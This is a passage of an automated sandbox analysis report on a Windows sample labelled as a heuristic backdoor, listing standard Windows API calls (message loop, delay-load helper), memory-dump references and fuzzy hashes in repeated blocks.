                                                  • Part of subcall function 007EAC74: IsDialogMessageW.USER32(0001041A,?), ref: 007EACAA
                                                  • Part of subcall function 007EAC74: TranslateMessage.USER32(?), ref: 007EACB8
                                                  • Part of subcall function 007EAC74: DispatchMessageW.USER32(?), ref: 007EACC2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                • String ID:
                                                • API String ID: 897784432-0
                                                • Opcode ID: 82f323f85a66dd895a094cff72fc2531d775f6dcfb133e74181f4a369d3d65c8
                                                • Instruction ID: 3e5ae122505fef3feb0b131f690b65865ffd3cb006fb3ea9b71ca5437c72a7ba
                                                • Opcode Fuzzy Hash: 82f323f85a66dd895a094cff72fc2531d775f6dcfb133e74181f4a369d3d65c8
                                                • Instruction Fuzzy Hash: 2CD09E31144300FBD6122B51CE07F0F7AA6BB88B04F004954B345740B1CA66AD20AB16
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 7e4fce47a58699832bcfe2943fe5f8a0fe32170897c9b42c630c07957f577b71
                                                • Instruction ID: 8fb7207d898cc7c38b9882ad7b2870ec31bcf171ab718a68c4bbac5380aec4a4
                                                • Opcode Fuzzy Hash: 7e4fce47a58699832bcfe2943fe5f8a0fe32170897c9b42c630c07957f577b71
                                                • Instruction Fuzzy Hash: 18B012B126E042EC315CA14B6D16D3A021CE4C8B10330401AB51DD02C0D4487D080431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 8cea6e402e2360f69a5fe5a7cd546724f15c3003756d37f20fb58b460889738e
                                                • Instruction ID: d9ace1d6f595e2def31fb5d746beb78961d78c9cca9b91d899762b00ec45ea0a
                                                • Opcode Fuzzy Hash: 8cea6e402e2360f69a5fe5a7cd546724f15c3003756d37f20fb58b460889738e
                                                • Instruction Fuzzy Hash: C8B012B126E042EC315CA14A6E16D3A021CD4C8B10330401AB51DD02C0D4487E091431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 565a5a36cf9b58ecb821a24fe82998c18db8e64e0b278d43f1562e943d42489b
                                                • Instruction ID: 31a42c9acd6b6e866a4d7ade8b26ab3e7b2a3258e096f71f6932c61b90c50aa7
                                                • Opcode Fuzzy Hash: 565a5a36cf9b58ecb821a24fe82998c18db8e64e0b278d43f1562e943d42489b
                                                • Instruction Fuzzy Hash: 98B012B126E142EC3198A14A7D16D3A021CD4C8B10330411AB51DD02C0D4887D480431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 14fc4c439e35cf74bdd790fb5854e697db74cc595b5c2c8b8633b5188423746b
                                                • Instruction ID: a567161a23e47b4916cd38c76f3ca28516986ce301c9475f379d5127e6cc51be
                                                • Opcode Fuzzy Hash: 14fc4c439e35cf74bdd790fb5854e697db74cc595b5c2c8b8633b5188423746b
                                                • Instruction Fuzzy Hash: 89B012B126E042EC3158A14A6D16D3A021CD4C9B10330801AB91DD02C0D4487D080431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 5a20b74cd04021234c740cee2d8342c7fa9417b9ba31c8b0df7d8550e1828356
                                                • Instruction ID: 60d181b92bf32e5bf85eea82f4cb93dbae2e214d1e5cf7bd1022425a726f26b6
                                                • Opcode Fuzzy Hash: 5a20b74cd04021234c740cee2d8342c7fa9417b9ba31c8b0df7d8550e1828356
                                                • Instruction Fuzzy Hash: 38B012A126E042AC315CA14F6E16D3A020CD4C8B10330801AB51DD03C0D4487D0E1431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 45c48ab06122dd4ea5c19f2797ed86125e4f66199fa46637282df8424b95b824
                                                • Instruction ID: 7f01aca3784e1ebd42c2de345ee28e2d3bb58f0db30c46d8bdb97ddbf0f8aef8
                                                • Opcode Fuzzy Hash: 45c48ab06122dd4ea5c19f2797ed86125e4f66199fa46637282df8424b95b824
                                                • Instruction Fuzzy Hash: 57B012A126E182AC3198A14E7D16D3A020CD4C8B10330811AB51DD03C0D4887C8D0431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: c43fbfdffea026cded5410dd679681ca4272d27a72f34be7afc09e1bae66dae3
                                                • Instruction ID: ea7dcfbf9c8e3dbb2442939bf8c8bfe3f9f2207b065b92c55d983b08fcc41104
                                                • Opcode Fuzzy Hash: c43fbfdffea026cded5410dd679681ca4272d27a72f34be7afc09e1bae66dae3
                                                • Instruction Fuzzy Hash: A0B012A126E042AC3158A14E6D16D3A020CD4C9B10330C01AB91DD03C0D4487C0D0431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: b43706f93d45a16879bbda20c947d6f34660dde772338d02251c4910da5055f1
                                                • Instruction ID: e0af370dafba37564f9d32888119d743a02590ad312255f6d9e390e3136ee9d6
                                                • Opcode Fuzzy Hash: b43706f93d45a16879bbda20c947d6f34660dde772338d02251c4910da5055f1
                                                • Instruction Fuzzy Hash: E2B012A526E142AC3158A14A6D56D3F020CF4C8B10330401AB91DD02C0D54C7C080531
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 8a7fa03ea068bb0a36f93eca5b6a4da680301afbe13e4f71ae051c855c219784
                                                • Instruction ID: f31994ed3003994241a55e001a7b07c9de78ec4dc3e9a87d65125a036a1c7d75
                                                • Opcode Fuzzy Hash: 8a7fa03ea068bb0a36f93eca5b6a4da680301afbe13e4f71ae051c855c219784
                                                • Instruction Fuzzy Hash: FCB012A526E342BC315861467D66C3F020CD4C4B10330452AB91DE01C0D48C7C4C4431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: e7bd5dcefa8b16f7ba985e2a07edffe91d28cc1af11648570aea72535fa2eeb6
                                                • Instruction ID: 31095b7463895bd26efa6e167c6eed8100f5a96d7ced8c569644e3e7a1b3aa86
                                                • Opcode Fuzzy Hash: e7bd5dcefa8b16f7ba985e2a07edffe91d28cc1af11648570aea72535fa2eeb6
                                                • Instruction Fuzzy Hash: 05B012B126E142AC315CA14A6E16D3A028CD4C8B10730401AB51DD02C0E5487D091431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: f20e4a4d018773c50902afa0ce90466219e194515fded163a2c2a556bcc9102a
                                                • Instruction ID: b1c46516e2d2372e65086bb92e77e5adaab5eb5762b361ca43405cd6dfccceeb
                                                • Opcode Fuzzy Hash: f20e4a4d018773c50902afa0ce90466219e194515fded163a2c2a556bcc9102a
                                                • Instruction Fuzzy Hash: 4AB012A126E142AC3158A15A6D16D3A024CD4C9B10330801ABA1DD02C0E5487C080431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: c9a9da823dd68e306b38da8cb0d29e9241592ba1ee2d7b2de7bd9c351d4de2c9
                                                • Instruction ID: e249948f4088c8ec1057ce6addedcb798d08a3510543c7d89b54d997c9293de6
                                                • Opcode Fuzzy Hash: c9a9da823dd68e306b38da8cb0d29e9241592ba1ee2d7b2de7bd9c351d4de2c9
                                                • Instruction Fuzzy Hash: 34B012A127F042AC3158A14A6D16D3A024EE8C8B10730401AB65DD02C0D448BC080431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3
                                                  • Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
                                                  • Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: d4e78ba3cf5721074210859ca4d0722de0d99e75be20a7a6b2c20ad180c93474
                                                • Instruction ID: 342e5dd5e7b7e9492f43cdca71472f307ededdbe2869fef7d9aa1cc8566a5dcb
                                                • Opcode Fuzzy Hash: d4e78ba3cf5721074210859ca4d0722de0d99e75be20a7a6b2c20ad180c93474
                                                • Instruction Fuzzy Hash: C9B012B126F142AC3198A24A7D16D3A020ED4C8B10730411AB61DD02C0D488BC480431
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
